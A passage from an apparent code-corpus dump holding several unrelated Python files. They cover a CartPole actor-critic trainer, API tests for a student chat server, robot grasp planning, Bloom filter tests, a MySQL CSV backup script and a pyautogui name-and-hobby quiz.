from torch.distributions.categorical import Categorical
import torch.nn.functional as F
from torch.optim import Adam
import gym
import numpy as np
Device = torch.device("cuda:0")
class ActorCriticNet(nn.Module):
    """Shared-body actor-critic network for discrete action spaces.

    forward(obs) returns (action probabilities, state value).
    """
    def __init__(self, observation_space, action_space,
                 hidden_sizes=[32,32], activation=nn.Tanh):
        super().__init__()
        obs_dim = observation_space.shape[0]
        action_dim = action_space.n
        self.base_net = nn.Sequential(
            nn.Linear(obs_dim, hidden_sizes[0]),
            # nn.Linear(hidden_sizes[0], hidden_sizes[1]),
        )
        # BUG FIX: the heads must consume the base net's output width
        # (hidden_sizes[0]); the original used hidden_sizes[1], which only
        # worked when both entries happened to be equal.
        self.pi = nn.Linear(hidden_sizes[0], action_dim)  # policy head
        self.vf = nn.Linear(hidden_sizes[0], 1)           # value head
        self.to(Device)
    def forward(self, obs):
        obs = torch.Tensor(obs).to(Device)
        x = F.relu(self.base_net(obs))
        # Despite the name, these are softmax probabilities, not raw logits.
        action_logits = F.softmax(self.pi(x), dim=-1)
        value = self.vf(x)
        return action_logits, value
class Agent(object):
    """Episodic actor-critic agent: collects log-probs/values/rewards during an
    episode and updates the model once per episode in learn()."""
    def __init__(self, model=None, lr=1e-2, gamma=0.99):
        self.gamma = gamma
        self.AC = model
        # BUG FIX: optimize the model passed in, not the module-level global
        # `AC` the original referenced (which only worked by accident).
        self.optimizer = Adam(self.AC.parameters(), lr=lr)
        self.logp_as = []   # log-prob of each chosen action
        self.values = []    # critic value at each step
        self.rewards = []   # reward received at each step
    def choose_action(self, obs):
        """Sample an action from the policy; record log-prob and value."""
        action_logits, value = self.AC(obs)
        distribution = Categorical(action_logits)
        action = distribution.sample()
        self.logp_as.append(distribution.log_prob(action))
        self.values.append(value)
        return action.item()
    def learn(self):
        """One policy/value update over the stored episode, then clear buffers."""
        R = 0
        policy_losses = []
        value_losses = []
        returns = []
        # Discounted returns, computed backwards from the episode end.
        for r in self.rewards[::-1]:
            R = r + self.gamma * R
            returns.insert(0, R)
        returns = torch.tensor(returns).to(Device)
        # Normalize returns for stability (epsilon avoids div-by-zero).
        returns = (returns - returns.mean()) / (returns.std() + 0.00001)
        for logp_a, value, R in zip(self.logp_as, self.values, returns):
            advantage = R - value.item()
            # calculate actor (policy) loss
            policy_losses.append(-logp_a * advantage)
            # calculate critic (value) loss using L1 smooth loss
            value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).to(Device)))
        self.optimizer.zero_grad()
        loss = torch.stack(policy_losses).sum() + torch.stack(value_losses).sum()
        # NOTE(review): retain_graph=True kept from the original; with buffers
        # cleared below each episode builds a fresh graph — confirm it is needed.
        loss.backward(retain_graph=True)
        self.optimizer.step()
        self.rewards = []
        self.values = []
        self.logp_as = []
# Build env
env = gym.make('CartPole-v1')
state = env.reset()
# Learning setting
lr = 3e-2
EPISODES=30000
GAMMA = 0.99
hidden_sizes = [128,128]
show_every = 100  # render every N-th episode
AC = ActorCriticNet(env.observation_space, env.action_space, hidden_sizes)
agent = Agent(AC, lr=lr, gamma=GAMMA)
# BUG FIX: the exponential moving average of episode reward must persist
# across episodes; the original re-initialised it to 0 inside the loop, so
# the solve check effectively compared 0.05 * episode_reward to the threshold.
running_reward = 0
for episode in range(EPISODES):
    # For every episode init
    done = False
    obs = env.reset()
    I = 1
    T = 0  # episode length
    # Logs
    episode_reward = 0
    if episode % show_every == 0:
        is_render = True
    else:
        is_render = False
    while not done:
        # Render
        if is_render:
            env.render("human")
        # Predict action and value
        action = agent.choose_action(obs)
        # Step the env
        next_obs, reward, done, _ = env.step(action)
        # Update obs
        obs = next_obs
        agent.rewards.append(reward)
        T += 1
        # Logs
        episode_reward += reward
    # Learn once
    agent.learn()
    # Update cumulative reward (EMA with smoothing factor 0.05)
    running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward
    print(f"episode_{episode} \t ep_reward = {episode_reward} \t ep_len = {T}")
    if running_reward > env.spec.reward_threshold:
        print("Solved! Running reward is now {} and "
              "the last episode runs to {} time steps!".format(running_reward, T))
        break
|
4,383 | c22b37bff74de7ea99f2009652dd00e57bb316b8 | '''
HTTP Test for channel details
'''
import sys
sys.path.append('..')
from json import load, dumps
import urllib.request
import urllib.parse
import pytest
PORT_NUMBER = '5204'
BASE_URL = 'http://127.0.0.1:' + PORT_NUMBER
#BASE_URL now is 'http://127.0.0.1:5321'
@pytest.fixture
def register_loginx2_create_invite():
    '''
    Resets the workspace, registers and logs in 2 users, creates a public
    channel as user_1 and invites user_2 to it.

    BUG FIX: the login request for user_1 was built but never sent (the
    Request object was constructed and immediately overwritten); it is now
    dispatched like every other request.
    '''
    # RESET
    req = urllib.request.Request(
        f'{BASE_URL}/workspace/reset',
        headers={'Content-Type': 'application/json'},
        method='POST'
    )
    load(urllib.request.urlopen(req))
    # REGISTER user_1
    register_info_1 = dumps({
        'email': 'z5209488@unsw.edu.au',
        'password': 'enigma',
        'name_first': 'Alan',
        'name_last': 'Turing'
    }).encode('utf-8')
    req = urllib.request.Request(
        f'{BASE_URL}/auth/register',
        data=register_info_1,
        headers={'Content-Type': 'application/json'},
        method='POST'
    )
    load(urllib.request.urlopen(req))
    # REGISTER user_2
    register_info_2 = dumps({
        'email': 'z5432455@unsw.edu.au',
        'password': 'lovepassword',
        'name_first': 'Ada',
        'name_last': 'Lovelace'
    }).encode('utf-8')
    req = urllib.request.Request(
        f'{BASE_URL}/auth/register',
        data=register_info_2,
        headers={'Content-Type': 'application/json'},
        method='POST'
    )
    load(urllib.request.urlopen(req))
    # Login user_1
    login_info = dumps({
        'email': 'z5209488@unsw.edu.au',
        'password': 'enigma'
    }).encode('utf-8')
    req = urllib.request.Request(
        f'{BASE_URL}/auth/login',
        data=login_info,
        headers={'Content-Type': 'application/json'},
        method='POST'
    )
    load(urllib.request.urlopen(req))
    # Login user_2
    login_info = dumps({
        'email': 'z5432455@unsw.edu.au',
        'password': 'lovepassword'
    }).encode('utf-8')
    req = urllib.request.Request(
        f'{BASE_URL}/auth/login',
        data=login_info,
        headers={'Content-Type': 'application/json'},
        method='POST'
    )
    load(urllib.request.urlopen(req))
    # Hard-coded JWT for u_id 1 (matches the server's deterministic tokens).
    user_1_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMSJ9.N0asY15U0QBAYTAzxGAvdkuWG6CyqzsR_rvNQtWBmLg\''
    #user_2_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMiJ9.UNGv0HfSeyM4FtXkAc4HfuOl_HyNLFmRMeLx_4c0Ryg\''
    # user_1 creates a public channel
    channel_info = dumps({
        'token': user_1_token,
        'name': 'a channel',
        'is_public': True
    }).encode('utf-8')
    req = urllib.request.Request(
        f'{BASE_URL}/channels/create',
        data=channel_info,
        headers={'Content-Type': 'application/json'},
        method='POST'
    )
    load(urllib.request.urlopen(req))
    # user_2 join user_1's channel
    join_info = dumps({
        'token': user_1_token,
        'channel_id': 1,
        'u_id': 2
    }).encode('utf-8')
    req = urllib.request.Request(
        f'{BASE_URL}/channel/invite',
        data=join_info,
        headers={'Content-Type': 'application/json'},
        method='POST'
    )
    load(urllib.request.urlopen(req))
def test_details_basic(register_loginx2_create_invite):
    '''
    This test should pass with no issues
    '''
    # Hard-coded JWT for u_id 1 (server issues deterministic tokens).
    user_1_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMSJ9.N0asY15U0QBAYTAzxGAvdkuWG6CyqzsR_rvNQtWBmLg\''
    #user_2_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMiJ9.UNGv0HfSeyM4FtXkAc4HfuOl_HyNLFmRMeLx_4c0Ryg\''
    # Get channels details
    queryString = urllib.parse.urlencode({
        'token': user_1_token,
        'channel_id': 1
    })
    payload = load(urllib.request.urlopen(f"{BASE_URL}/channel/details?{queryString}"))
    #payload = load(urllib.request.urlopen(req))
    # The fixture created channel 1 as 'a channel', owned by user 1.
    assert payload['name'] == 'a channel'
    assert payload['owner_members'] == [{"u_id": 1, "name_first": "Alan", "name_last": "Turing"}]
def test_invalid_channelID(register_loginx2_create_invite):
    '''
    Channel ID is not a valid channel
    '''
    user_1_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMSJ9.N0asY15U0QBAYTAzxGAvdkuWG6CyqzsR_rvNQtWBmLg\''
    #user_2_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMiJ9.UNGv0HfSeyM4FtXkAc4HfuOl_HyNLFmRMeLx_4c0Ryg\''
    # Channel 50 was never created, so the server should reject the request.
    queryString = urllib.parse.urlencode({
        'token': user_1_token,
        'channel_id': 50
    })
    with pytest.raises(urllib.error.HTTPError):
        urllib.request.urlopen(f"{BASE_URL}/channel/details?{queryString}")
    #load(urllib.request.urlopen(req))
def test_unauthorised_user(register_loginx2_create_invite):
    '''
    Authorised user is not a member of channel with channel_id.

    BUG FIX: user_3's login request was built but never sent; it is now
    dispatched before the details request is attempted.
    '''
    register_info_2 = dumps({
        'email': 'z5454545@unsw.edu.au',
        'password': 'testPassword',
        'name_first': 'Test',
        'name_last': 'User'
    }).encode('utf-8')
    req = urllib.request.Request(
        f'{BASE_URL}/auth/register',
        data=register_info_2,
        headers={'Content-Type': 'application/json'},
        method='POST'
    )
    load(urllib.request.urlopen(req))
    login3_info = dumps({
        'email': 'z5454545@unsw.edu.au',
        'password': 'testPassword'
    }).encode('utf-8')
    req = urllib.request.Request(
        f'{BASE_URL}/auth/login',
        data=login3_info,
        headers={'Content-Type': 'application/json'},
        method='POST'
    )
    load(urllib.request.urlopen(req))
    # Hard-coded JWT for u_id 3; user 3 is not a member of channel 1.
    user_3_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMyJ9.hnzKv5QKl78L2jWvtB8w9kcxZHo1UFxGN5shF7HBK0Y\''
    queryString = urllib.parse.urlencode({
        'token': user_3_token,
        'channel_id': 1
    })
    with pytest.raises(urllib.error.HTTPError):
        urllib.request.urlopen(f"{BASE_URL}/channel/details?{queryString}")
|
4,384 | 738e6d4d608aa977094420a432cbd8a05ea8a1b5 | import math
import numpy as np
import basis.robot_math as rm
import grasping.annotation.utils as gu
from scipy.spatial import cKDTree
def plan_contact_pairs(objcm,
                       max_samples=100,
                       min_dist_between_sampled_contact_points=.005,
                       angle_between_contact_normals=math.radians(160),
                       toggle_sampled_points=False):
    """
    find the contact pairs using rayshooting
    the finally returned number of contact pairs may be smaller than the given max_samples due to the min_dist constraint
    :param objcm: collision model whose surface is sampled
    :param max_samples: number of surface points to sample
    :param min_dist_between_sampled_contact_points: spacing constraint between samples
    :param angle_between_contact_normals: minimum opposition angle for a valid pair
    :param toggle_sampled_points: also return the raw sampled points
    :return: [[[contact_p0, contact_n0], [contact_p1, contact_n1]], ...]
    author: weiwei
    date: 20190805, 20210504
    """
    contact_points, face_ids = objcm.sample_surface(nsample=max_samples,
                                                    radius=min_dist_between_sampled_contact_points / 2)
    contact_normals = objcm.objtrm.face_normals[face_ids]
    contact_pairs = []
    # KD-tree over the sampled points for fast radius queries below.
    tree = cKDTree(contact_points)
    near_history = np.array([0] * len(contact_points), dtype=bool)
    for i, contact_p0 in enumerate(contact_points):
        if near_history[i]: # if the point was previous near to some points, ignore
            continue
        contact_n0 = contact_normals[i]
        # Shoot a ray through the object from just inside the surface,
        # against the normal, to find the opposing surface point.
        hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * .001, contact_p0 - contact_n0 * 100)
        if len(hit_points) > 0:
            for contact_p1, contact_n1 in zip(hit_points, hit_normals):
                # Accept only nearly-antipodal normals (graspable opposition).
                if np.dot(contact_n0, contact_n1) < -math.cos(angle_between_contact_normals):
                    near_points_indices = tree.query_ball_point(contact_p1, min_dist_between_sampled_contact_points)
                    if len(near_points_indices):
                        # Mark similar nearby samples so they are skipped later.
                        for npi in near_points_indices:
                            if np.dot(contact_normals[npi], contact_n1) > math.cos(angle_between_contact_normals):
                                near_history[npi] = True
                    contact_pairs.append([[contact_p0, contact_n0], [contact_p1, contact_n1]])
    if toggle_sampled_points:
        return contact_pairs, contact_points
    return contact_pairs
def plan_grasps(hnd_s,
                objcm,
                angle_between_contact_normals=math.radians(160),
                openning_direction = 'loc_x',
                rotation_interval=math.radians(22.5),
                max_samples=100,
                min_dist_between_sampled_contact_points=.005,
                contact_offset=.002):
    """
    Plan antipodal grasps for *objcm* with gripper *hnd_s*.

    :param hnd_s: gripper instance (must expose jawwidth_rng)
    :param objcm: collision model of the object
    :param angle_between_contact_normals: opposition threshold for contact pairs
    :param openning_direction: 'loc_x' or 'loc_y' depending on gripper types
    :param rotation_interval: angular step when rotating about the contact axis
    :param max_samples: number of surface samples for contact-pair search
    :param min_dist_between_sampled_contact_points: spacing constraint between samples
    :param contact_offset: offset at the contact to avoid being closely in touch with object surfaces
    :return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]
    """
    contact_pairs = plan_contact_pairs(objcm,
                                       max_samples=max_samples,
                                       min_dist_between_sampled_contact_points=min_dist_between_sampled_contact_points,
                                       angle_between_contact_normals=angle_between_contact_normals)
    grasp_info_list = []
    # NOTE: removed an unused function-local `import modeling.geometric_model`
    # that the original carried but never referenced.
    for i, cp in enumerate(contact_pairs):
        print(f"{i} of {len(contact_pairs)} done!")
        contact_p0, contact_n0 = cp[0]
        contact_p1, contact_n1 = cp[1]
        contact_center = (contact_p0 + contact_p1) / 2
        # Widen the jaw by the offset on both sides so fingers clear the surface.
        jaw_width = np.linalg.norm(contact_p0 - contact_p1) + contact_offset * 2
        if jaw_width > hnd_s.jawwidth_rng[1]:
            continue  # object too wide for this gripper at this pair
        if openning_direction == 'loc_x':
            jaw_center_x = contact_n0
            jaw_center_z = rm.orthogonal_vector(contact_n0)
            jaw_center_y = np.cross(jaw_center_z, jaw_center_x)
        elif openning_direction == 'loc_y':
            jaw_center_y = contact_n0
            jaw_center_z = rm.orthogonal_vector(contact_n0)
        else:
            raise ValueError("Openning direction must be loc_x or loc_y!")
        grasp_info_list += gu.define_grasp_with_rotation(hnd_s,
                                                         objcm,
                                                         gl_jaw_center_pos=contact_center,
                                                         gl_jaw_center_z=jaw_center_z,
                                                         gl_jaw_center_y=jaw_center_y,
                                                         jaw_width=jaw_width,
                                                         gl_rotation_ax=contact_n0,
                                                         rotation_interval=rotation_interval,
                                                         toggle_flip=True)
    return grasp_info_list
def write_pickle_file(objcm_name, grasp_info_list, root=None, file_name='preannotated_grasps.pickle', append=False):
    """Persist *grasp_info_list* for *objcm_name* via grasping.annotation.utils;
    *root* defaults to the current directory."""
    target_root = root if root is not None else './'
    gu.write_pickle_file(objcm_name, grasp_info_list, root=target_root, file_name=file_name, append=append)
def load_pickle_file(objcm_name, root=None, file_name='preannotated_grasps.pickle'):
    """Load the pre-annotated grasps for *objcm_name* via
    grasping.annotation.utils; *root* defaults to the current directory."""
    target_root = root if root is not None else './'
    return gu.load_pickle_file(objcm_name, root=target_root, file_name=file_name)
if __name__ == '__main__':
    # Demo: plan grasps for a block mesh with the XArm gripper and render
    # every candidate grasp pose in the panda3d world.
    import os
    import basis
    import robot_sim.end_effectors.grippers.xarm_gripper.xarm_gripper as xag
    import modeling.collision_model as cm
    import visualization.panda.world as wd
    base = wd.World(cam_pos=[.5, .5, .3], lookat_pos=[0, 0, 0])
    gripper_s = xag.XArmGripper(enable_cc=True)
    objpath = os.path.join(basis.__path__[0], 'objects', 'block.stl')
    objcm = cm.CollisionModel(objpath)
    objcm.attach_to(base)
    objcm.show_localframe()
    grasp_info_list = plan_grasps(gripper_s, objcm, min_dist_between_sampled_contact_points=.02)
    for grasp_info in grasp_info_list:
        jaw_width, gl_jaw_center_pos, gl_jaw_center_rotmat, hnd_pos, hnd_rotmat = grasp_info
        # Render each grasp with a fresh gripper copy posed at the hand frame.
        gic = gripper_s.copy()
        gic.fix_to(hnd_pos, hnd_rotmat)
        gic.jaw_to(jaw_width)
        print(hnd_pos, hnd_rotmat)
        gic.gen_meshmodel().attach_to(base)
    base.run()
|
4,385 | a55d1286485e66a64aa78259ad1b1922c5c4c831 | from typing import *
class Solution:
    def isMonotonic(self, A: List[int]) -> bool:
        """Return True iff A is entirely non-increasing or non-decreasing."""
        direction = 0  # 0 until the first non-zero step fixes the trend sign
        for prev, curr in zip(A, A[1:]):
            step = curr - prev
            if step * direction < 0:
                # Step opposes the established trend: not monotonic.
                return False
            if direction == 0:
                direction = step
        return True
# Quick manual check: [1,2,2,2,1] rises then falls, so expect False.
sl=Solution()
inp=[1,2,2,2,1]
print(sl.isMonotonic(inp))
|
4,386 | 21d499555b4bc4944996a57ae544a56aa317b00b | for t in range(int(input())):
st = list(input())
N,j = len(st),1
for i in range(N//2):
if st[i]=='*' or st[-i-1]=='*':
break
elif st[i] != st[-i-1]:
j=0
break
print('#{} Exist'.format(t+1)) if j else print('#{} Not exist'.format(t+1)) |
4,387 | 309f8016dfebcc3595291b127edb4634f72298ec | # -*- coding: utf-8 -*- #
import time
from openerp.osv import osv, fields
import logging
import openerp.addons.decimal_precision as dp
logger = logging.getLogger(__name__)
class ebiz_supplier_account_create(osv.osv_memory):
    _name = 'ebiz.supplier.account.create.wizard'
    _description = "Ebiz Supplier Account"
    def create_supplier_action(self, cr, uid, ids, context=None):
        """Create supplier account lines from the wizard's active records and
        open a tree view filtered to the created lines.

        NOTE(review): context.get raises if context is None despite the
        default — confirm callers always pass a context dict.
        """
        active_ids = context.get('active_ids',False)
        supplier_ids = self.pool['ebiz.supplier.account.line'].create_ebiz_supplier_account_line(cr, uid, active_ids, context=context)
        # Action descriptor: show only the freshly created lines ([0] when none).
        return {
            'view_type': 'form',
            'view_mode': 'tree',
            'res_model': 'ebiz.supplier.account.line',
            'type': 'ir.actions.act_window',
            'domain':[('id','in',supplier_ids or [0])],
        }
# Old-API model registration: instantiating registers the model with the pool.
ebiz_supplier_account_create()
|
4,388 | e67cbddf10440e8a31373e05a82840677d3045f5 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2018-12-20 13:06
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds country/description/director/grenre/year columns to both
    # moviesinfo and usermovies. Each field uses default=1 (coerced to the
    # string "1" for existing rows) with preserve_default=False so the
    # default is dropped from the schema after backfilling.
    dependencies = [
        ('login', '0006_usermovies_img'),
    ]
    operations = [
        migrations.AddField(
            model_name='moviesinfo',
            name='country',
            field=models.CharField(default=1, max_length=50),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='moviesinfo',
            name='description',
            field=models.CharField(default=1, max_length=200),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='moviesinfo',
            name='director',
            field=models.CharField(default=1, max_length=100),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='moviesinfo',
            name='grenre',
            field=models.CharField(default=1, max_length=50),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='moviesinfo',
            name='year',
            field=models.CharField(default=1, max_length=8),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='usermovies',
            name='country',
            field=models.CharField(default=1, max_length=50),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='usermovies',
            name='description',
            field=models.CharField(default=1, max_length=200),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='usermovies',
            name='director',
            field=models.CharField(default=1, max_length=100),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='usermovies',
            name='grenre',
            field=models.CharField(default=1, max_length=50),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='usermovies',
            name='year',
            field=models.CharField(default=1, max_length=8),
            preserve_default=False,
        ),
    ]
4,389 | 24e486edc6f80e0b7d58b5df898e6d34f53111c8 | from pyloom import *
import random
import string
# Candidate characters for random keys: upper- and lower-case ASCII letters.
alphabet = string.ascii_letters

def random_string(N):
    """Return a random string of N ASCII letters drawn from *alphabet*."""
    return ''.join(random.choice(alphabet) for _ in range(N))
class TestBloomFilter(object):
    """Unit tests for pyloom's fixed-size BloomFilter."""
    def test_setup(self):
        # Sizing for 1000 items at the default error rate.
        bf = BloomFilter(1000)
        assert 10 == bf._num_hashes
        assert 14380 == bf._num_bits
        assert 14380 == len(bf._bitarray)
        # and initially all bits are False
        assert 0 == bf._bitarray.count()
        # test again with a different false positive rate
        bf = BloomFilter(1000, error=0.01)
        assert 7 == bf._num_hashes
        assert 9583 == bf._num_bits
        assert 9583 == len(bf._bitarray)
        # and initially all bits are False
        assert 0 == bf._bitarray.count()
    def test_add_contains(self):
        # Every added key must be reported as present (no false negatives).
        bf = BloomFilter(1000, error=0.01)
        keys1 = [random_string(10) for _ in range(1000)]
        # NOTE(review): keys2 is generated but never used here — presumably a
        # leftover from a false-positive check; confirm or remove upstream.
        keys2 = [random_string(10) for _ in range(1000)]
        for k in keys1:
            bf.add(k)
            assert k in bf
class TestScalableBloomFilter(object):
    """Tests that the scalable filter keeps its error bound while growing."""
    def test_scaling(self):
        # S: initial capacity, N: items inserted (forces growth), E: error rate.
        S, N, E = 1000, 10000, 0.01
        # create a bloom filter with initial capacity of S
        sbf = ScalableBloomFilter(S, E, 2)
        keys1 = {random_string(10) for _ in range(N)}
        keys2 = {random_string(10) for _ in range(N)}
        for k in keys1:
            sbf.add(k)
            assert k in sbf
        # Measure the false-positive rate on keys never inserted.
        error = 0
        total = 0
        for k in keys2:
            if k in keys1:
                continue
            total += 1
            if k in sbf:
                error += 1
        error_rate = error / total
        # Allow 2x slack over the nominal rate for statistical noise.
        assert error_rate <= 2 * 0.01, 'Error rate is %.3f when it should be %.3f' % (error_rate, E)
|
4,390 | fd76a7dd90bac7c7ba9201b6db62e6cb3eedeced | import mysql.connector
from getpass import getpass
# Per-table SELECT prologues for the backup: each emits a header row via
# UNION ALL, then the data columns. backup_table() appends the INTO OUTFILE
# and FROM clauses.
tables_schema = {
    "Country": "SELECT 'Id','Name','Code' " +
               "UNION ALL " +
               "SELECT Id, Name, Code ",
    "Indicator": "SELECT 'Id','Name','Code' " +
                 "UNION ALL " +
                 "SELECT Id, Name, Code ",
    "Year": "SELECT 'Id','FiveYearPeriod','TenYearPeriod' " +
            "UNION ALL " +
            "SELECT Id, FiveYearPeriod, TenYearPeriod ",
    "Metric": "SELECT 'CountryId','IndicatorId','YearId','Measurement' " +
              "UNION ALL " +
              "SELECT CountryId, IndicatorId, YearId, Measurement "
}
# Module-level connection handles, populated by connect_db().
dbconnector = None
cursor = None
def backup_db(cursor):
    """Dump every table listed in tables_schema to /tmp CSV files."""
    for table_name in tables_schema:
        backup_table(cursor, table_name)
def backup_table(cursor, table):
    """Export *table* to /tmp/<table>_data.csv with a header row, using
    MySQL's SELECT ... INTO OUTFILE (writes on the DB server's filesystem)."""
    cursor.execute(f"{tables_schema[table]}" +
                   f"INTO OUTFILE '/tmp/{table.lower()}_data.csv' " +
                   "FIELDS TERMINATED BY ',' " +
                   "LINES TERMINATED BY '\\n' " +
                   f"FROM {table}")
def print_report(db_name):
    """Announce a successful backup of *db_name* on stdout."""
    message = f"Database: '{db_name}' successfully backed up under '\\tmp' directory!"
    print(message)
def connect_db(password, db_name):
    """Open a root connection to the local MySQL server and populate the
    module-level dbconnector/cursor handles (autocommit enabled)."""
    global dbconnector, cursor
    dbconnector = mysql.connector.connect(
        host = "localhost",
        user = "root",
        passwd = password,
        database = db_name,
        autocommit = True
    )
    cursor = dbconnector.cursor()
def main():
    """Prompt for the MySQL root password, back up WORLDMETRIC, and report."""
    password = getpass("MySQL password:")
    db_name = "WORLDMETRIC"
    connect_db(password, db_name)
    backup_db(cursor)
    print_report(db_name)
    dbconnector.close()
main() |
4,391 | 16e10db90a0a0d8ee7ca5b0c7f86cc81432d87d1 | import webbrowser as wb
# Running score accumulated across all quiz questions below.
points = 0
import time as t
import pyautogui as pg
# Ask for the player's name once; .title() normalises capitalisation so the
# comparisons below only need to match title-cased values.
name = pg.prompt("What is your name? ").title()
pg.alert(name)
# Score and react to the player's name: each recognised name awards points,
# shows an alert, pauses, and opens a themed web page.
if name == "Caroline":
    pg.alert("Hi " + name)
    points += 5
    t.sleep(1)
    wb.open("https://www.textgiraffe.com/Caroline/Page2/")
elif name == "Bob":
    pg.alert(name + ",you are a great person!")
    points += 3
    t.sleep(1)
    wb.open("http://dreamworks.wikia.com/wiki/File:Bob_the_Builder.jpeg")
elif name == "Catherine":
    pg.alert(name + "I like you already.")
    points += 2
    t.sleep(2)
    wb.open("https://www.amazon.com/Catherine-Street-Sign-Reflective-Aluminum/dp/B00KY6ZDZW")
elif name == "James":
    pg.alert("nice to meet you" + name)
    points += 1
    t.sleep(1)
    wb.open("https://www.youtube.com/watch?v=uV9LYMAEnRA")
elif name == "Kate":
    pg.alert("Hello!")
    points += 2
    t.sleep(1)
    wb.open("https://www.google.com/search?q=kate+name&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwj-3cyIyJzeAhVRnOAKHRnoCtQQ_AUIDigB&biw=924&bih=639#imgrc=sbQIiK5VLfo7kM:")
elif name == "Will":
    pg.alert("Coool!")
    # Bug fix: this line read "ponts += 3", which raised a NameError whenever
    # the player answered "Will".
    points += 3
    t.sleep(2)
    wb.open("https://www.google.com/search?q=will+name&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwj3n93PyJzeAhWvY98KHcoWCFEQ_AUIDigB&biw=924&bih=639#imgrc=Z0hfeIoXQgHxJM:")
else:
    pg.alert("I don't know you!")
    points += 0
    t.sleep(2)
    wb.open("https://www.google.com/search?q=smiley+face&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjwsdL4gYveAhXtc98KHaGcAz0Q_AUIDigB&biw=1366&bih=657")
# Question 2: favourite colour. Same pattern as above — alert, adjust score,
# pause, open a related page. Note "Black" and "Brown" subtract points.
color = pg.prompt ("what is your favorite color? ").title()
if color == "Blue":
    pg.alert ("mine too!")
    points += 5
    t.sleep(1)
    wb.open ("https://www.youtube.com/watch?v=SoIKv3xxuMA")
elif color == "Pink":
    pg.alert ("Do you like unicorns too?")
    points += 2
    t.sleep(2)
    wb.open ("https://www.youtube.com/watch?v=a-xWhG4UU_Y")
elif color == "Purple":
    pg.alert ("cool!")
    points += 3
    t.sleep(1)
    wb.open ("https://www.youtube.com/watch?v=TvnYmWpD_T8")
elif color == "Black":
    pg.alert ("ok...")
    points -= 2
    t.sleep(2)
    wb.open ("https://www.google.com/search?q=goth&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwiJ-tDj-oreAhUpUt8KHWZsAzQQ_AUIDigB&biw=1366&bih=657#imgrc=odGcWJwuqRcJsM:")
elif color == "Yellow":
    pg.alert ("Like a sunflower!")
    points += 1
    t.sleep (1)
    wb.open ("https://www.google.com/search?q=sunflower&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwiZyKCTyZzeAhXGc98KHd8kDJ8Q_AUIDigB&biw=924&bih=639#imgrc=8kZ1NZp_9-nr5M:")
elif color == "Brown":
    pg.alert ("wow.")
    points -= 5
    t.sleep (1)
    wb.open ("https://www.youtube.com/watch?v=dsJtgmAhFF4")
else:
    pg.alert("nice")
    points += 1
    t.sleep(2)
    wb.open ("https://giphy.com/explore/rainbow")
# Question 3: favourite sport. All comparison values are already title-cased,
# so every branch is reachable.
sport = pg.prompt ("What is your favorite sport? ").title()
if sport == "Hockey":
    pg.alert ("yep, I guess your cool")
    points += 5
    t.sleep(2)
    wb.open ("https://www.youtube.com/watch?v=JDnZTUkCOBQ")
elif sport == "Soccer":
    pg.alert ("you mean futbol...")
    points += 5
    t.sleep(2)
    wb.open ("https://www.youtube.com/watch?v=K-U1ZgrsGGg")
elif sport == "Lacrosse":
    pg.alert (" I used to play..")
    points += 2
    t.sleep(2)
    wb.open ("https://www.youtube.com/watch?v=o5hsPBsGD44")
elif sport == "Football":
    pg.alert ("that cool.")
    points += 4
    t.sleep(3)
    wb.open ("https://www.google.com/search?q=football&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwimsOqj_IreAhUumeAKHd-FD6kQ_AUIDigB&biw=1366&bih=657#imgrc=GCqjPQ-jqckcfM:")
elif sport == "Field Hockey":
    pg.alert ("Nice!")
    points += 2
    t.sleep(3)
    wb.open ("https://www.google.com/search?q=field+hockey&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwieus2jypzeAhWvVN8KHeK1CJ8Q_AUIDigB&biw=924&bih=639#imgrc=FCpGZY2CS5KVXM:")
elif sport == "Surfing":
    pg.alert ("WOAH")
    points += 7
    t.sleep(1)
    wb.open ("https://www.youtube.com/watch?v=HBklS2vYEPo")
else:
    pg.alert ("cool")
    points += 0
    t.sleep(2)
    wb.open ("https://www.google.com/search?q=no+sports&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwiGqOK-_IreAhXFneAKHcEGANIQ_AUIDigB&biw=1366&bih=657#imgrc=y7acx-yoEouoUM:")
# Question 4: favourite subject. The answer is normalised with .title(), so
# every branch must compare against a title-cased value.
subject = pg.prompt("What is your favorite subject?").title()
if subject == "Math":
    pg.alert("so your a mathmatician")
    points += 2
    t.sleep(3)
